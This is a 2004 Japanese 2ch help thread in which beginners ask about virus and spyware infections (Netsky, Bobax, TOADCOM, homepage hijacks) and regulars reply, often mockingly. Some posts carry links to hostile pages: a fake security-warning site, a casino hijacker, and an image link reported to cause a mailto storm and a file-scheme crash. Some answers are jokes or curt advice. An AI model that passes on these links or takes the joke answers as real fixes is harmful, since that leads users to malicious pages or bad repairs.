FAQ読め http://greatsearch.biz/

58 :53:04/07/11 12:38 ID:2yEkJisn
>>57
ご親切にありがとうございます。
しかし、頂いたURLの内容は私にはとても理解できません。
初心者な私ですが、もう少し勉強してきます。(´・ω・`)

59 :名無しさん@そうだ選挙に行こう:04/07/11 12:55 ID:???
マルチで地雷とは・・・おめでて〜な

60 :名無しさん@そうだ選挙に行こう:04/07/11 14:20 ID:L9Y8Vx9H
こんにちは。
一昨日から知らない人達からメールが送られてきて、(1つは添付付)
ノートンアンチウイルスから警告でまくりなんですが、放置しといても
いいですよね? W32.netsky.@pmm に感染しているって警告なんですが。。
ご教授お願いいたします。

61 :名無しさん@そうだ選挙に行こう:04/07/11 14:21 ID:???
>>60
知らないメールは開かず削除でソッコー解決。

62 :名無しさん@そうだ選挙に行こう:04/07/11 14:36 ID:L9Y8Vx9H
>>61
ありがとうございました!

63 :名無しさん@そうだ選挙に行こう:04/07/11 16:23 ID:???
最近 ポート135
よくスキャンか受信しそうになったりか
するんですよ
みなさんもそうですか?

64 :名無しさん@そうだ選挙に行こう:04/07/11 17:25 ID:???
>>63
ポート135 は必ず閉じていなければならない。
PCの中に何か悪いプログラムでも入ってんじゃねーの?

65 :ひよこ名無しさん:04/07/11 20:22 ID:???
>>63
今多いのは、445と135
135はデフォルトで開いているファイル共有のポート、
スキャンが多くて当たり前だ。

66 :ひよこ名無しさん:04/07/11 20:25 ID:???

ファイル共有じゃなくて、RPCサービスで使うポートだ。

67 :ひよこ名無しさん:04/07/12 15:27 ID:fnS8zoX7
PCにはSymantec Antivirus Corporate Editionをインストールしているのですが
あるディレクトリをスキャンすると、物理ドライブ1のマスターブートセクターをスキャンし始めるんです。
そんで、スキャンしたファイルが0のままスキャンを完了してしまいますし、問題のファイルは
削除できません。ディレクトリが空ではありません。の表示が出て、おしまいです。
しかも、そのファイルをいじくっていると、常駐ソフトがいつの間にか終了していくんです。
もうだめです。
誰か教えてください。


68 :ひよこ名無しさん:04/07/12 15:28 ID:???
>>67
ウイルス入りの割れだから。

69 :67:04/07/12 15:37 ID:fnS8zoX7
>>68
すいません、意味がわかりません

70 :ひよこ名無しさん:04/07/12 15:39 ID:???
>>69
Symantecに聞けばいい。

71 :ひよこ名無しさん:04/07/12 16:01 ID:???
>>67
怪しげなファイルを何故弄くるかな?

とりあえずセーフモードでスキャンかオンラインスキャン
感染してたならウィルス名書け

72 :ひよこ名無しさん:04/07/12 16:23 ID:???
個人でわざわざ Corporate Edition を買うヤシはいない。

73 :67:04/07/12 16:31 ID:fnS8zoX7
>>71
やってみます

>>72
学校で使っているやつを家に持ち帰ってインストールしたからでつ

74 :ひよこ名無しさん:04/07/12 16:38 ID:???
>>73
それを違法コピーと言う。

75 :ひよこ名無しさん:04/07/12 17:21 ID:???
>>67
逮捕記念上げ

76 :ひよこ名無しさん:04/07/12 17:37 ID:SuP0HIde
ウィルスに感染しました。
トレンドマイクロのオンラインスキャンで
スキャンした所、bobax.Cというウィルスらしいです。
ノートンアンチウィルス2004を購入してきて
インストールしようと思うのですがシステムがシャットダウン
されてインストールできません。
bobaxの駆除方法はございますでしょうか?

77 :76:04/07/12 17:38 ID:SuP0HIde
すいませんOSはXPhomeです

78 :ひよこ名無しさん:04/07/12 17:46 ID:???
>>67
とりあえず通報して様子見

79 :ひよこ名無しさん:04/07/12 17:48 ID:???
>>77
回線を切らないと駆除作業ができないから、メモっとけ
http://www.symantec.com/region/jp/sarcj/data/w/w32.bobax.c.html

80 :ひよこ名無しさん:04/07/12 20:11 ID:???
Antinnyはどうやって駆除するのでしょうか?

81 :ぼるじょあ ◆yBEncckFOU :04/07/12 20:19 ID:???
>>80
m9(・3・) エェー 割れ廚発見しますた

82 :ひよこ名無しさん:04/07/12 21:51 ID:YEXjOho4
ファイルがどんどん消えていったのですが、新しいHD購入して復元というソフトを使ってファイルの復元を試みたところ、ファイルサイズがすべて33になっていて復元できませんでした。
これらのファイルを復元する方法はありますか?

83 :ぼるじょあ ◆yBEncckFOU :04/07/12 21:55 ID:???
>>82
m9(・3・) エェー 割れ廚発見しますた


84 :人科:04/07/12 22:01 ID:rWsN86yZ
ここはスパイウェアーあつかってますか!!?????

85 :ひよこ名無しさん:04/07/12 22:04 ID:???
>>82
ねえよ、もうおわり。

86 :ひよこ名無しさん:04/07/12 22:04 ID:???
>>84
スパイウエアはこっち
エロサイト見たら…助けてください!Part31
http://pc6.2ch.net/test/read.cgi/pcqa/1088914336/

87 :ひよこ名無しさん:04/07/13 01:35 ID:xDgRN+4O
すいません、質問させてください。
一昨日スパイウェアに感染?してしまい、
何とか復元できたと思っていたら今日ウィルスに感染していました。
Windous XP使用で元から入っていた
Norton AntiVirusを使っているのですが
Trojan Horseに感染したようです。
「修復できません、最新の定義ウイルスをダウンンロードしてください。」
と出たためダウンロードしたのですが修復出来ません。
どうすれば良いのでしょうか?
テンプレを何度も読んだのですがよく分かりません。
無知で申し訳ないのですか、アドバイスお願いします。

ウィルスに感染したのはやはりスパイウェアが原因なのでしょうか?

88 :ひよこ名無しさん:04/07/13 01:55 ID:LZAloZsF
質問です
昨日からパソコンの調子がオカシイので
BIGLOBEのホームページでウィルススキャンとゆうのをやってみた所
『C:\Program Files\gikoNavi\Log\2ch\morningcoffee\1083344761.dat は
 VBS.Network.E に感染しています。
C:\Program Files\gikoNavi\Log\2ch\mnewsplus\1079793541.dat は
 VBS.Internal に感染しています。
C:\Program Files\gikoNavi\Log\2ch\livetbs\1088710560.dat は
 VBS.LoveLetter.A に感染しています。
C:\Documents and Settings\Owner\Local Settings\Temp\Temporary Internet Files\Content.IE5\RFDW50R0\sahra6138[1].jpg は
 Js.Trojan.WindowBomb に感染しています。 』
と出て来たのですが
パソコンに関して素人なのでどうしていいのかよく解かりません・・・
どうしたらいいのでしょうか?

89 :ひよこ名無しさん:04/07/13 01:56 ID:???
>>88
アンチウィルスソフト買ってきて駆除。


90 :ひよこ名無しさん:04/07/13 01:57 ID:???
>>88
上の三つはノートンの誤反応なので無視しても良い。
最後のは
InternetExplorerの「ツール」メニュー「インターネットオプション」で
「インターネット一時ファイル」を削除すればいいはず。

91 :88:04/07/13 02:15 ID:LZAloZsF
削除したのですが治る気配がありません・・・
Windous XPを使ってるんですが
ちなみにオカシナ所とゆうのは
InternetExplorerの「ツール」メニュー「インターネットオプション」
の場所で「インターネット一時ファイル」の上にある
「ホームページ」のアドレスが『about:blank』とゆうのになってて
設定を変えても最初は変えたとおりに表示されるのですが
しばらくするとまた『about:blank』とゆう表示に戻ってしまうことです

ちなみにギコナビのレスを表示する場所は今までスレを選択してない時は
何も表示されなかったのですが今はその『about:blank』のホームページが
表示されます
分かりにくい文章でスミマセン

92 :ひよこ名無しさん:04/07/13 02:16 ID:???
>>91
あー、スパイウェアにやられてるね。エロサイトスレのテンプレをやれ。

93 :ひよこ名無しさん:04/07/13 02:19 ID:???
>>91 >>88
このスレッドの 4-11 とそのリンク先を読んで自己努力
↓ 偽のリンクを貼るヤツがいるので、リンク先をよく確認。

エロサイト見たら…助けてください!Part31
http://pc6.2ch.net/test/read.cgi/pcqa/1088914336/4-11

about:blank / Search for の対策も載っています

94 :ひよこ名無しさん:04/07/13 02:26 ID:???
プロ地雷師がいるようだなw

95 :88:04/07/13 02:41 ID:LZAloZsF
>>93
色々試した所オカシナ症状が治まりました
どうもありがとうございます
これで一安心です
色々ご迷惑お掛けしました

96 :ひよこ名無しさん:04/07/13 02:43 ID:???
>>95
Search for は再起動したら再発することもあるので要注意

97 :ひよこ名無しさん:04/07/14 00:08 ID:???
●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●

無料のウイルス対策ソフトなどのセキュリティソフト一覧
http://pc5.2ch.net/test/read.cgi/software/1088262283/1

●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●

98 :ひよこ名無しさん:04/07/14 09:06 ID:UWS7vQ2a
かなり深刻な状態になったので質問にまいりました。
win2000でインターネットエクスプローラー6を使ってます
昨日四窓くらいしてインターネットをしていたらフリーズしてしまい
PCの本体の電源ボタンを押しっぱなしにして電源を切りました。
それで今日PCつけてみたらマウスがおかしいのです。左クリックができないのです
で右でダブルクリックとかすると開いたり起動したりします。
ココまでくるのにTABキーをつかってやっときました。これはウイルスでしょうか?
本当にくるしいです助けてください。


99 :ひよこ名無しさん:04/07/14 09:09 ID:???
マウス買い換えればOK。
何故ならドライバ新しいの入るからね。

とりあえず、デバイスマネージャからマウス削除して再起動しろ。

100 :ひよこ名無しさん:04/07/14 09:09 ID:???
>>98
聞く前にウイルススキャンしろ!
そんな症状だけでウイルスかどうかわかるほど甘くない。

101 :ひよこ名無しさん:04/07/14 09:10 ID:???
ウィルススキャンしたら普通にLogファイル拾うだろうな。(w



102 :ひよこ名無しさん:04/07/14 09:30 ID:???
>>101
エロサイトと誤爆?

103 :ひよこ名無しさん:04/07/14 09:36 ID:???
>>102
ばれたか。

104 :ひよこ名無しさん:04/07/14 11:26 ID:D5UfceDq
http://www.smart-security.info/?affid=DNN-1
パソコンつけたらいきなりyou are in dangerという警告があって
その警告に誘導されると上のurlのページにたどり着きました
やばいんでしょうか?

105 :ひよこ名無しさん:04/07/14 11:28 ID:???
>>104
パソコン持って逃げろ。

106 :ひよこ名無しさん:04/07/14 11:52 ID:???
>>104
簡単にダマされるんだな。

107 :ひよこ名無しさん:04/07/14 12:01 ID:M0SZ1qUN
こんにちわ。バイオノートユーザーです。
先週末くらいにメールから
NETSKY.Pのワームに感染してしまいました。
ノートンを購入し削除して安心してたのですが
あまりに重いんでちょっと調べてみたら
Cドライブに「program file」というフォルダがあり、
ものすごい勢いで大きさが増えてます。
また、共有フォルダには「download music」
という不明なフォルダができています。
接続のところには変なネットワークサービスが
3件ほどローカルネットワーク接続している状態です。
下2件は削除できるのですが、「program〜」は
誰かが実行中で削除できません。_vti_〜ってやつです。
当然ウィルススキャンにはひっかからず、ブート扱い?です。

気味が悪いので覚悟を決めて再インストールしたのですが
なくなってくれません。カスタマーサービスにも
昨日から全然電話がつながりません。どうすればよいのでしょうか?
支離滅裂で分かりづらい文章かもしれませんが
宜しくお願いします。

108 :ひよこ名無しさん:04/07/14 12:02 ID:???
>>107
もうネットに接続するな。

109 :104:04/07/14 12:28 ID:D5UfceDq
>>106
だまされてるってどうゆう事ですか?
どうしたらいいのか教えてください

110 :ひよこ名無しさん:04/07/14 12:30 ID:???
>>109
そういう警告はウソで、ボタンを押すとウイルスが侵入するしかけ。

111 :ひよこ名無しさん:04/07/14 12:31 ID:???
>>109
>その警告に誘導されると上のurlのページにたどり着きました
常人にはそんな場所に誘導されても怖くて行けないよ。
裏路地に連れ込もうとしている薬の売人に平気でついていっちゃようなもんだ。

112 :ひよこ名無しさん:04/07/14 12:42 ID:???
>>109
いや、もうスパイウェア入ってるから。
エロサイトスレのテンプレやれ。テンプレやる前に質問するな。
やって疑問があるなら具体的にやった方法まで詳しくかけ。

113 :98:04/07/14 17:21 ID:I4TOl2tX
ディバイスマネージャーというところからマウスを削除して再起動しました
そしてあたらしいディバイス入れるとかなってまた再起動しました
しかし治りませんでした。新しいマウスを買えば治るものなのでしょうか?
どうかよろしくお願いします。あと
ウイルスでは無かったら違うところで質問したほうが
いいでしょうか?

114 :ひよこ名無しさん:04/07/14 17:25 ID:???
>>113
お前馬鹿かよ。

・そのマウスにドライバは付属してきたか?
・マウスは後から買ったものか?・
マウスの型番はなにか?
・お前のPCの型番は何か?
・OSは何か?



115 :ひよこ名無しさん:04/07/14 17:25 ID:+kMTWCeT
あの、ネットをしてたらウィルスバスターから「ウィルスを発見しました」とメッセージが出ました。
これって感染してしまったのでしょうか?どういう状況なんでしょうか。
教えてください。


116 :ひよこ名無しさん:04/07/14 17:27 ID:???
>>115
ウィルススキャンすればいいだろ。

俺らはお前のPCを直接見てるわけじゃないんだ。

117 :ひよこ名無しさん:04/07/14 17:47 ID:???
>115
何のためのバスターだよ。「感染したかも」と思ったらウィルススキャンしなさいよ。
何も情報出さないで聞くより、そのほうが確実だよ。
まー「ウィルス見つけたけど感染は防ぎました」ってことだとは思うけど、念のため。

118 :113:04/07/14 18:10 ID:X7P4GPcy
OSはウインドウズ2000です。
PCは友人の作った自作PCです
マウスはバリューマウス(PS/2)とかいてあります
ドライバというのが付属してたかはわからないです。
これじゃどうしようもないですかね?なんとかお願いします
いまも右クリックしかできないです

119 :ひよこ名無しさん:04/07/14 18:12 ID:???
>>118
取り敢えず、マウスのドライバはプラグアンドプレイで入ったとして、
汎用マウスドライバでも左クリックができないという事は無いだろうから、
マウス自体の故障と考えた方がいいかもしれない。

新しいマウスにすれば、ドライバも付属してくるし、
機械的故障も無いので大丈夫だろう。

安いから買いな。

120 :ひよこ名無しさん:04/07/14 18:13 ID:???
>>118
名前欄は最初の番号で固定するのがこの板のルール。
毎回直前の番号にするのはどこのルールなんだ?
マウスなんて500円で買えるんだから、さっさと買ってこいよ。


121 :ひよこ名無しさん:04/07/14 18:17 ID:+kMTWCeT
116、117さんありがとう。
スキャンすれば良かったんですね。パニクっててそんなことすら分からなかったです。
一安心しました、ありがとう。


122 :ひよこ名無しさん:04/07/15 09:03 ID:+zigUuAm
すいません質問です。
PC使用中に急にシャットダウンさせるウィルスってあるのでしょうか?
前触れもなく突然落ちてしまいます。
立ち上げて30分以内に必ずです。

オンラインスキャンしようにも、途中で落ちちゃうのでどうしようも・・
パソはNECのLaVieL XPhomeです。

123 :ひよこ名無しさん:04/07/15 09:11 ID:???
>>122
なくはないだろうけど、この時期はオーバーヒートの可能性が大きい。
メーカーPCはコンパクトケースが多く、排熱効率が悪い。
冷房がよく効いた部屋を前提として作られてるってことね。

124 :ひよこ名無しさん:04/07/15 09:13 ID:???
>>122
ウィルス、スパイウェア、熱暴走、電源関係

お前の情報で考えられるのはこの程度。
情報少なすぎるから特定できないし、対策も書けない。

大体、ウィルススキャンなんて30分も掛からないだろう。

125 :ひよこ名無しさん:04/07/15 10:30 ID:???
>>124
メーカー製は買ったばかりの状態で20〜30分かかるのは珍しくないぞ。
ちょっと使い込んだだけですぐ30分なんぞオーバーするようになる。
>>122
NECだろ?だったらオンラインスキャンせんでもウイルス駆除ソフトがついてきているだろう?
それをupdateして使ったらどうなんだ?
まずはそれをやってからの話。
やれないならやれない理由を。(アンインストールしたというなら論外w)

126 :125:04/07/15 10:34 ID:???
事故レス
>>122
スマンかった。(速くシャットダウンするんだったな)
めんどくさいから、サポセンへどうぞ。
でなければ扇風機の風を当てながら、自前のソフトでウイルススキャンしてみる。
うまくいかなきゃ、こちらへ(特に>>1-10くらいは嫁)
エロサイト見たら…助けてください!Part31
ttp://pc6.2ch.net/test/read.cgi/pcqa/1088914336/

127 :122:04/07/15 13:47 ID:???
レスありがとうがざいます。
冷房きかせて、扇風機あてた状態でもすぐ落ちてしまいました。
さきほどノートン先生でチェックしてみた所、ウィルスはなしとでました
(この間にも数回落ちた。。

サポート電話したら、修理だしてと言われたので
そうすることにします。

ありがとうございました。
結果わかりましたら、報告にきたいと思います。

128 :ひよこ名無しさん:04/07/15 20:02 ID:???
CCDファイルをデーモンでマウントしたら、
ノートンがW32.Whiter.Trojanに反応しました。
ファイルにアクセス出来ません、削除できませんのループ後
一個のファイルが感染しています。とでました。
その後フルスキャンしても見つかりません。
再起動してもファイルも消えないしレジストリも見つかりません。
これは感染しているのですか?

129 :ひよこ名無しさん:04/07/15 20:10 ID:???
>>128
P2P関係のやつは自分は知ってっても教えんようにしている。
申し訳ないけどダウン板で聞いてくれ。

W32.Whiter.Trojanというウイルスがどういったものか知らないのが、
君の敗因。Whiterかなり極悪です。残念でした。

130 :ひよこ名無しさん:04/07/15 23:12 ID:???
>>128
再起動してもファイルが消えてないなら多分大丈夫。
Whiterならαβοοη..._〆(゚▽゚*)してるから。



131 :ひよこ名無しさん:04/07/15 23:30 ID:isbQ3o+7
特に思い当たることはないのですが
ここ数日起動するとノートン・インターネットセキュリティが無効になっています
最新定義のウィルススキャン・ad-awareでも何も検出されません
オプションの起動メニューも「システム起動時に実行する」にチェックが入っています
やっぱりウィルスでしょうか?

132 :131:04/07/15 23:32 ID:???
忘れてました。バージョンは2002です

133 :ひよこ名無しさん:04/07/15 23:45 ID:???
マウスが勝手に動き回るんです。
キモイです。ウイルスですか?
助けてママン(;´Д`)

134 :ひよこ名無しさん:04/07/15 23:49 ID:???
>>133
マウスに足でも生えてきたのか?

135 :133:04/07/15 23:54 ID:???
裏蓋を開けたらゴキブリさんが
出てきました。もう大丈夫です。


136 :ひよこ名無しさん:04/07/16 01:13 ID:???
大昔ゴキタンに人類はひどいめにあったんだろうな
その記憶があるからキャーと悲鳴をあげるんだろな

137 :ひよこ名無しさん:04/07/16 14:08 ID:bAHu3bus
以前トロイの木馬ウイルスにかかってリカバリしたんですが、リカバリしたらもう
ウイルスの心配は無いんですか?

138 :ひよこ名無しさん:04/07/16 14:15 ID:iA3OY9oP
すいません、ウィルスを貼りまっくてる馬鹿者が
いるんですけど、運営の人に報告するにはどこの
スレにいけばいいですか?

スレ違いかも知れませんが教えて下さい。

139 :ひよこ名無しさん:04/07/16 14:17 ID:???
>>138
そのページを閉鎖させちまえばOK

140 :ひよこ名無しさん:04/07/16 14:18 ID:???
>>138
運営行ったらいいよ。運用情報板か、削除依頼するなら削除整理板。

141 :140:04/07/16 14:21 ID:???
まあ報告したとこでアク禁にはならないだろうけどね。程度にもよるが。
削除はしてくれるだろうけど。

142 :138:04/07/16 14:22 ID:???
レスありがとうございます。

あまりにも悪質なので削除ではなくて、あく禁にして貰いたいのですが
無理なのかな?

143 :140:04/07/16 14:25 ID:???
>>142
>>141の通り程度による。つーか、マルチポストはやめろ。

144 :ひよこ名無しさん:04/07/16 14:37 ID:F71l70WA
申し訳無いですがpc使っていると勝手に
http://www.casinopalazzo.com/index.php?sourceid=100783
のサイトが出てきてショートカットまで作られるのですが
初心者なので直し方がわかりません・・。
教えていただけませんか

145 :138:04/07/16 14:39 ID:???
スレッド削除依頼にだします。どうもでした。

どこで聞いたらいいのか分からなくて「くだらねぇ質問はここに書き込め!ver8.51」
にも書き込んじゃいました。すいません。


146 :ひよこ名無しさん:04/07/16 14:40 ID:???
>>144
ad-aware
SPYBOT
これで駆除

147 :ひよこ名無しさん:04/07/16 14:43 ID:F71l70WA
>>146さま

回答ありがとうございます。
しかしその意味がわからないのですがそれはどこで使えるのでしょうか?

148 :ひよこ名無しさん:04/07/16 14:47 ID:???
>>138
ウイルス対策ソフトを常駐させろてこと
まぁ反面教師ということでゆるしてやれ

149 :ひよこ名無しさん:04/07/16 14:47 ID:???
>>147
手がかりをもらったらまず自分で検索。

150 :ひよこ名無しさん:04/07/16 14:51 ID:???
>>147
エロサイト見たら…助けてください!Part32
http://pc6.2ch.net/test/read.cgi/pcqa/1089908314/

151 :ひよこ名無しさん:04/07/16 14:59 ID:F71l70WA
ありがとうございます。
とりあえず検索してみたのですが英語だらけでなにがなんだか・・。
難しいですね。。
これってお金かかりますか?

152 :ひよこ名無しさん:04/07/16 15:07 ID:???
>>151
無料、エロサイト見たらスレの>8に解りやすく書いてあるよ。

153 :ひよこ名無しさん:04/07/16 15:12 ID:lrGtYAMB
マカフィーを使っているのですが、
>>131と全く同じ症状が出ます。
その都度、再インストールして使用しているのですがめんどくさくてしかたありません。
対処法はないでしょうか?

154 :ひよこ名無しさん:04/07/16 15:21 ID:3jgNANHN
つまらない質問で恐縮なんですが、JPGなどのファイルを選択しただけで
ウイルスに感染するということはありえるんでしょうか?ちなみにOSはWIN2Kで
従来のWindowsデスクトップを使用しているので、プレビューはしない状態です。

155 :ひよこ名無しさん:04/07/16 15:22 ID:???
>>153
だんな
2ちゃん住人はノートンもしくは バスター
激しく推奨しております

へい

156 :ひよこ名無しさん:04/07/16 15:24 ID:lrGtYAMB
>>155
二週間前にコピったノートンをインストールして使っていたところこの症状が出たので、
ちゃんとマカフィーを買っちゃったんですよ。


157 :ひよこ名無しさん:04/07/16 15:26 ID:???
>>156
コピった?

158 :ひよこ名無しさん:04/07/16 16:47 ID:???
>>156
コピった?

159 :ひよこ名無しさん:04/07/16 17:07 ID:???
うん

160 :ひよこ名無しさん:04/07/16 17:09 ID:???
>>156
通報しておいた

161 :ひよこ名無しさん:04/07/16 17:12 ID:???
何で?

162 :ひよこ名無しさん:04/07/16 17:43 ID:???
ムシャクシャしていたから。
通報するのは何でも良かった。
これからは通報しない。

163 :ひよこ名無しさん:04/07/16 18:13 ID:iA3OY9oP
反省してるの?

164 :ひよこ名無しさん:04/07/17 03:02 ID:BCxdTdm+
最近PCがおかしなウィンドウが出るようになり、ノートンでスキャンした所
何も検出されなかったので、>>2のウィルスバスターの評価版を試してみようと思い
ダウンロードしてみたら、ノートンをアンインストールしてくださいとでたのですが
これはノートンを完全に削除しないとインストール出来ないということですか?
分からなくなって途中で止めてしまいました。ほんっとにバカな質問ですいません・



165 :ひよこ名無しさん:04/07/17 03:04 ID:???
>>164
ウィルスソフトを同時に複数インストールすると
不具合が生じる事が多い。よってメーカーで他のウィルス
ソフトが入ってたらその手の警告を出すようにしてたりする。

お前の症状はウィルスじゃなくてスパイウェアだな。
エロサイトスレのテンプレやれ。



166 :ひよこ名無しさん:04/07/17 04:11 ID:???
>>165
質問に答えていただいてありがとうがざいます。
エロサイトスレのテンプレやってみます。

167 :ひよこ名無しさん:04/07/17 12:08 ID:???
>>165
ウィルスソフトなんてインストールしたら、ウィルスだらけになってしまう。

168 :ひよこ名無しさん:04/07/17 18:32 ID:YxtaOksL
質問です。
前にトロイの木馬に感染してリカバリーしたんですが、
トロイの木馬というのは聞くところによると、こちらのパソコンの情報を
見たり盗んだりできるみたいですが、本当にそういうことをされたのか、心配
です。感染した経験のある方は僕のように心配にならなかったんですか?
それともそういう心配する必要はなくて、心配しすぎですか?
馬鹿な質問ですが教えてください。

169 :ひよこ名無しさん:04/07/17 18:33 ID:???
>>168
お前の情報なんて大した価値ねえよ。
気にすんな。禿るぞ。

170 :ひよこ名無しさん:04/07/17 18:51 ID:???
>>168
せいぜいスパムメールだらけになるくらいだ。
リカバリーしたか、ファイアーウォールが発信を監視してくれているのなら、心配すんな。

171 :168:04/07/17 21:04 ID:???
分かりました。ありがとうございました。

172 :ひよこ名無しさん:04/07/18 00:59 ID:???
Unix.Penguinというトロイの木馬式ウイルスが入ってきたようです。
あちこち探したり過去ログ読んだりしたのですが、駆除方法がわかりません。
申し訳ありませんが、どなたか教えてください。


173 :ひよこ名無しさん:04/07/18 01:03 ID:???
>>172
>>1 にある質問の仕方を守ってください。
ノートンの誤反応の可能性もあるみたいですよ。

174 :ひよこ名無しさん:04/07/18 01:34 ID:8ZenGQWK
すいません。win98です。

トレンドマイクロのオンラインスキャンで
「TROJ_DYFUCA.M」というトロイの木馬型ウイルスが三つ検出されたので、
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DYFUCA.M
ここ↑を参考にして、まず普通に削除しようとしました。
一つはそのまま削除できたんですが、あと二つは
「指定されたファイルはWindowsが使用しています」と出て削除できません。
そこで↑のサイトで見たとおりWindowsSafeモードで削除しようとしたんですが、
やはり同じメッセージが出て削除できません。

次に、駆除もできる、と聞いたPanda ActiveScanを使ってウイルスを検索してみたんですが、
なぜか今度はウイルス自体が検出されませんでした。
自動削除でもされたのかと思ってふたたびトレンドマイクロのものを試してみると、
やっぱり二つ検出されます。

どうしたらこの二つのファイルを削除できるんでしょうか?
Windowsフォルダの中にあるんですが…。

175 :ひよこ名無しさん:04/07/18 01:38 ID:???
>>174
WinfileからBANすりゃいいじゃん。

176 :174:04/07/18 01:45 ID:8ZenGQWK
>>175
レスありがとうございます。
すいません、「Winfile」と「BAN」というのはなんのことなんでしょう
Windows98のヘルプで検索してみたんですが…みつからなくて。

177 :ひよこ名無しさん:04/07/18 01:50 ID:???
>>176
ファイル名を指定して実行>winfile

エクスプローラーライクに使えるが、なんでも消せるから気をつけて使え。

178 :174=176:04/07/18 01:53 ID:8ZenGQWK
>>177
ありがとうございます。

やってみます。
やってみたらまた書きます。

179 :ひよこ名無しさん:04/07/18 02:03 ID:???
>>178
セーフモードで使用中になるのなら、MS-DOSモードで起動しなくちゃ消せまい。

180 :174=176=178:04/07/18 02:21 ID:8ZenGQWK
>>177
本当にありがとうございました。
スタートメニューからWinfileを起動して、Windowsを選択して、
感染したファイルを削除することができました。
念のためにトレンドマイクロのオンラインスキャンで検索してみましたが、
ウイルスは検出されませんでした。
寝る前に「ウイルス感染したファイルが消せなくて困った時はWinfileを起動して消す」
とノートにでも書いておくことにします。

>>179
レスありがとうございます。
幸い上記のような方法で消すことができました。


181 :ひよこ名無しさん:04/07/18 02:28 ID:???
Meで_restoreフォルダ消せるかどうか、Winfileでやってみよう。

182 :ひよこ名無しさん:04/07/18 02:43 ID:kWINApNM
今パソコンを起動したらウイルスに感染しているとでました。ウイルスバスターでも処理、隔離できなかったようです
それでインターネットを起動しようとするとこんな画面が出てきたのですhttp://monositu.org/imagebord/img/Monositu_20040718022936-158.JPG
(この画面は何故か勝手にトップページに指定されます。プロパティで元に戻してもまたこれに勝手に設定されます)
きっと感染したウイルスのせいだと思い、このウイルスの駆除方法を調べてみました。
が、感染したファイル名を知る必要があるようですが、なぜか感染報告にも感染したファイル名が表示されないのです。
しかも(多分このウイルスのせいだと思いますが)フォルダを開くと四角で囲んだ点しか表示されないのです。
どうしたらよいでしょうか?
これはその画像です。http://monositu.org/imagebord/img/Monositu_20040718023002-161.JPG
http://monositu.org/imagebord/img/Monositu_20040718023031-107.JPG

183 :ひよこ名無しさん:04/07/18 02:47 ID:???
>>182
窓の手使え。

184 :ひよこ名無しさん:04/07/18 02:49 ID:???
MeのWinfileには、_restoreフォルダが表示されませんでした。
表示しない仕様のようです。仕方がないので消せそうもないExplorer.exeを削除しようとした所、
やっぱり使用中で消せませんでした。

185 :ひよこ名無しさん:04/07/18 02:51 ID:???
>>182
あるじゃん。まぁ、スパイウェアなんだが。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A


186 :182:04/07/18 02:54 ID:kWINApNM
>>183
これは直すことができるんですよね?
本当にすみません。窓の手というのはどういうことでしょうか?
>>185
そこのページを見て駆除方法試みようとしたのですが感染したファイル名がわからないのです。どうしたらよいでしょうか?

187 :ひよこ名無しさん:04/07/18 02:57 ID:???
>>186
ウィルススキャンしてパスを書きしたためればいいじゃん?

188 :ひよこ名無しさん:04/07/18 03:00 ID:kWINApNM
>>187
それがスキャンすると何故か感染は0になっているんです
ですがスキャン途中に
http://monositu.org/imagebord/img/Monositu_20040718023031-107.JPG
この画面が出てくるんです

189 :ひよこ名無しさん:04/07/18 03:01 ID:???
>>188
とりあえず、エロサイトスレのテンプレを全部やる事だな。全部ね。

190 :ひよこ名無しさん:04/07/18 03:09 ID:kWINApNM
>>189
エロサイトスレ?ってのはなんですか?
このスレのテンプレを全部やれってことですか?そうすれば直りますか?

ところで話は変わりますが
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A
 この不正プログラムは、リモートユーザーにSMTPメールを使い攻撃対象のコンピュータの情報を送信します。
ハッカーは、インターネット上のチャットシステムであるIRCのアプリケーションを使用して攻撃対象のWindowsをコントロールすることが可能です。またこの不正プログラムにより攻撃対象のコンピュータは、他のコンピュータにDDoS攻撃をする場合もあります。


と書いてありましたが、これは僕のパソコンが自由に操られ、自由勝手なことをされるということですか?


191 :ひよこ名無しさん:04/07/18 03:10 ID:???
>>186
「窓の手使え」というのはネタ回答。

どこ見てんだ? ファイル名ちゃんと書いてあるだろうが。
> この不正プログラムは、<Windowsフォルダ>内に"COMCFG.EXE"と"SYSTEM.EXE"
> というファイル名で自身のコピーを作成します。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A&VSect=T
このファイルを探して削除。レジストリの改変を修復。とにかくトレンドの対策ページ
よく読め。

192 :ひよこ名無しさん:04/07/18 03:14 ID:kWINApNM
>>191
わかりました。とりあえずまずCOMCFG.EXE"と"SYSTEM.EXEを削除すればいいわけですね?
レジストリの改変を修復したいんですけど改変される前のレジストリ値がわからないんです。どうしたらよいでしょうか

193 :ひよこ名無しさん:04/07/18 03:16 ID:???
やっぱ、全然読んでないだけじゃん。

本気で治したいのかね。何様のつもりで俺らに読ませてるんだろう。

194 :ひよこ名無しさん:04/07/18 04:57 ID:???
>>192
PCを修理業者に出したらまずは国語の勉強からだな・・・

195 :ひよこ名無しさん:04/07/18 09:55 ID:8BOu+AZV
>>173
レスありがとうございました。ルールを無視してしまって申し訳ありません。
確認しましたが幸いノートンの誤反応だったようです。本当にどうもありがとうございました。

196 :ひよこ名無しさん:04/07/18 17:56 ID:zsLZE6oz
http://ime.nu/ime.nu/sakashita.strangeworld.org/source/up0768.jpg

これをクリックしてしまいました。
後で気付いたら、下記の指摘のレスが付いていました。

対象 URL
http://sakashita.strangeworld.org/source/up0768.jpg
--------------------------------------------------------------------------------

mailto ストーム
アンカータグではないタグで mailto: の記述が見つかりました。
メール作成ウィンドウがたぁっくさん出てきてしまうかもしれません。
パワーのないマシンでは,ブラウザがフリーズする可能性があります。
--------------------------------------------------------------------------------

FDD アタック / concon クラッシャー等 [img タグ等]
IMG タグや JavaScript 等により file スキーマを参照します。
ブラウザの設定によってはフロッピーディスクドライブに不要な
アクセスが続いたり, OS がクラッシュする可能性があります。

_________________________

でも、クリックしてから接続がつながらなかったみたいだったので、
画面右上の×をクリックしました。上記のウイルス影響の指摘文の症状とか、
困った症状は起きていなくていつも通りなんですが、これはセーフだったという
ことでしょうか?どなたか教えてください。


197 :ひよこ名無しさん:04/07/18 18:03 ID:???
>>196
セーフでした。よかったね。

